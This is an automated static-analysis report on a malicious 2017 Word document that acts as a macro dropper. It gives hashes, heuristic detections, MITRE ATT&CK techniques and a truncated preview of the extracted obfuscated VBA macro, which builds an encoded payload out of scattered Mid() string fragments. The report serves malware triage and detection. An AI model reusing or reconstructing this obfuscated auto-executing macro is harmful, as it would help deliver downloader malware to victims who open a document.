Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 96e92fce1a2e310f…

MALICIOUS

Office (OLE)

83.0 KB Created: 2017-10-31 21:16:00 Authoring application: Microsoft Office Word First seen: 2017-11-13
MD5: d1895239938a87f6826643f61c098184 SHA-1: 40c498842fcd3e48177158713745efd39e4a65dd SHA-256: 96e92fce1a2e310fd738cddd7b981c0e70bf6b09d80aed154054530c5fb939a3
244 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious OLE document containing a VBA macro. The macro includes a Shell() call and is marked as an auto-executing macro (AutoOpen), indicating it's designed to run automatically when the document is opened. This strongly suggests the macro's purpose is to download and execute a second-stage payload. The ClamAV detection also points to a dropper functionality.

Heuristics 8

  • ClamAV: Doc.Dropper.Agent-6362166-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6362166-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 40969 bytes
SHA-256: 66ad90aeb341e4bf07ac45d0dfc3b421a9c23f4eac7c591d13386c9194efaf18
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 60 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "SiqVHJBoX"
Function LuUbIlskz()
dSECBjSoo = IdfcPutWj
BWYnt = Mid("9aphBwklJZE25EsWA3ACAALAAgADgAMwAsADkAOQAgACwAMQAxADQALAAgADEAMAA1ACAALAAxADEAMgAsACAAMQAxADYALAAgADQANgAgACwAIAA4ADMALAAxADAANAAsACAAMQAwADEALAAxADAAOAAgACwAMQAwADgALAAdMHz7", 17, 153)
FnaiqCzrSA = BWYnt
YnCmmmNvT = ZLzwHitFP
jiiiWd = Mid("ERKbQ0jIEDJlrZ7ZO9lU4DkANwAsADEAMQA2ACwAMQAwADQALAAzADIAIAAsACAANgAxACwAMwAyACAALAAzADYALAAgADEAMAAxACAALAAgADEAMQAwACAALAAgADEAMQA4ACwANQA4ACwAMQAxADYAIAAsADEAMAAxACp5", 22, 145)
fdXKmiHp = jiiiWd
PiDiFXpIf = BhwwsrNOi
hSKqoFuludz = Mid("tvzN5mjAbAxADAAIAAsADUANAAgACwANQA2ACAALAAgADQANgAsACAAMQAwADAALAAxADAAMQAgACwAIAA0ADcAIAAsACAAMQAwADcALAA4ADkALAAgADkAMAAgACwANAA3ACwAIAAzARLSiDQjHBqGzP74", 10, 131)
oYHwHZrEH = hSKqoFuludz
zrfSoFNtc = rLVBiJfdr
RkwzDk = Mid("HiJPSLpO8jh0GNiAsACAAMQAxADzWk1vU4NArc71If", 16, 12)
CGwKnMGtwwj = RkwzDk
fqhfwiHMO = UcTGjtwwO
iwAQRc = Mid("uQAgACwAIAAxADIANQAgACkAKQApAA==VLdUt55j6bQLBK5Sl7", 2, 31)
cIkbvZr = iwAQRc
jzpzUMuww = JzwoQOzhX
TYZsJnGvLw = Mid("af8hmfLWMYctCAALAAxADAAOQAgACwAIAAx9LpPr9nufEqAA", 14, 22)
SKISHC = TYZsJnGvLw
ASuAKcrsQ = JkccFmvvj
AWFiTnU = Mid("l6lVZU7vZPUh9chlYJEALAA5ADgALAA2ADcALAAxADAAOAAsACAAMQAwADUAIAAsADEAMAAxACAALAAxADEAMAAsADEAMQA2ACwAIAA1ADkALAAzqTtRLFQ3Ziz0", 19, 94)
thODpAEqj = AWFiTnU
BiWVkwhzM = PjLEGBVvd
IwAJNbGNi = Mid("8FQAxADYALAAxADEANgAgACwAMQAxADIAIAAsACAANQA4ACwAIAA0ADcALAAgADQANwAgACwAIAAxADAAMQAsADEAMAA5ACwAIAAxADAAOQAgACwZULpc2izpjBNl6jGA3ACNNQnvL", 3, 110)
LENUjDjBJl = IwAJNbGNi
TjmNFcvlN = UjuLtUiwz
qvLlNfl = Mid("fTs5AziHjT412ACAALAAxADAAMgAsADmYX5", 13, 19)
RzRwqaWG = qvLlNfl
BiivSNQbM = FEiaGJJbM
dnmXznssoQi = Mid("hGfTvIfHACwAIAAxADEANwAgACwAMQAxADUALAA0ADYAIAAsACAAMQAwADAALAAxADAANwAgCTAKHiiZ5EZ4rlZX4i8Zv", 9, 64)
XANlDs = dnmXznssoQi
tocuZwlNQ = RDmqVICUQ
wfKMQSjHkz = Mid("T1bKRjGQihSMZpE4wTB9sqwlJPAIAAsACAAOQA3ACAALAA0ADUAIAAsACAAMQAxADQAIAAsADkANwAgACwAMQAxADUAIAAsADEAMAA5IvbQw", 27, 77)
oVYCDQU = wfKMQSjHkz
uYQZzdPqj = jtakCSIoK
PAXAiVdhfdK = Mid("8wBjNfjYpisADEAMgAgACwAIAAzADIALAAgADQAMwAgACwAMwAyACwAIAAzADkAIAAsACAAOQAyACAALAAgADMAOQAsADMAMgAgACwAIAA0ADMAIAAsADMAMgAgACwAMwA2ACwAIAAxADEAMAAgACwAOQA3ACAALAAgAJwmNJ", 12, 153)
AKdnuL = PAXAiVdhfdK
WGEjKFwwY = aOjVYlsOD
UqPTd = Mid("P5ADcAIAAsADEAMQwisFuAq5OYA5TPRAVqBw", 2, 15)
wDoPqCP = UqPTd
wUrzijSCU = qhBUihwjO
IQoVb = Mid("WjEL6uZXLYujbDAAMQAgACwAMQAyADAAIAAsACAAMQAxADYAIAAsADQAMAAgACwAIAA0ADkALAA0ADQALAAgADMAMgAgACwANQA0ACAALAA1ADMALAAgADUAMwAsACAANQAxACAALAA1ADQALAAgADQAMQAgACwANQA5ACwAMwA2ACAALAAxADEAMgAsArMlJOT272L35G", 14, 176)
WUHWFjJw = IQoVb
MLNLcwFpc = zNUoroOLT
MrZvmpWQj = Mid("L7dztzhMjm6MQAxADAAIAAsADEAMAAxACwAMQAxADkALAA0ADUALAAxADEAMQAsACAAOQA4ACAALAAgADEAMAA2ACwAMQAwADEALAA5ADkALAAxADEANgAsACAAMwAyACAALAAgADgAMwAgACwAIAAxADIAMQAgACwAIAAxADEANQAsADEAMQA2ACAALAAgA87Kwc8vfCdMusC4oPsJMDhBX", 12, 181)
pZuOaks = MrZvmpWQj
SXcVRIkGR = WGfBWsXjD
qTEviw = Mid("l3LHdzipcAAMQAwADgALAAxADAANQAsADYAOAAgACwAMQAxADYAIAAsACAAMQAxADcALAA3ADcALAAgADkANwAgACwANAA3ACAALAAgADQANAAgACwAMQAwADQALAAgADEAMQA2ACwAIAAxADEANgAsADEAMQAyACwANQA4ACwAIAA0ADcALAA0ADcAIAAsADEAMQA1ACwAMQAx5J38JdPZOJKoqhYLr1wu4UQJj", 10, 198)
tRNumKhuSL = qTEviw
pkrstpGUo = zBpNFXNfI
vCQwMQNwmFd = Mid("l6RLH6iND9mC4AbgBhAG0AZQBbADMALAAxADEALAAyAF0ALQBqAG8AaQBuACcAJwApACAAKABbAHMAVAByAGkATgBnCGzL5LX", 12, 79)
mldjcfTGw = vCQwMQNwmFd
lqtFaWhjj = zvqcRKkZa
DBQBzB = Mid("iWkALAAxADAAMQAsACAAOQA5ACAALAAgADEAMQA2ACAALAZ4c8F0K2V7fT", 4, 43)
wmscMw = DBQBzB
cadnOwTkE = bJAIorjlq
WkAoaKiGZ = Mid("VY9bkihDwAMwA2ACwAIAAxADEANwAsADEAMQA0ACAALAAxADAAOAAgACwAMwAyACwAMQAwADUAIAAsADEAMQAwACAALAAzADIALAAgADMANgAsADEAMQA3ACwAMQAxADQAIAAsADEAMAA4ACwAMQAxADUALAA0ADEALAAxADIAMwoa5OfiDCzGQjhWXO", 9, 164)
djQnsYSON = WkAoaKiGZ
JkKVKKFJZ = zXkfcfwlF
URNzVlcRsj = Mid("co1zH3Tqj4iwu
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.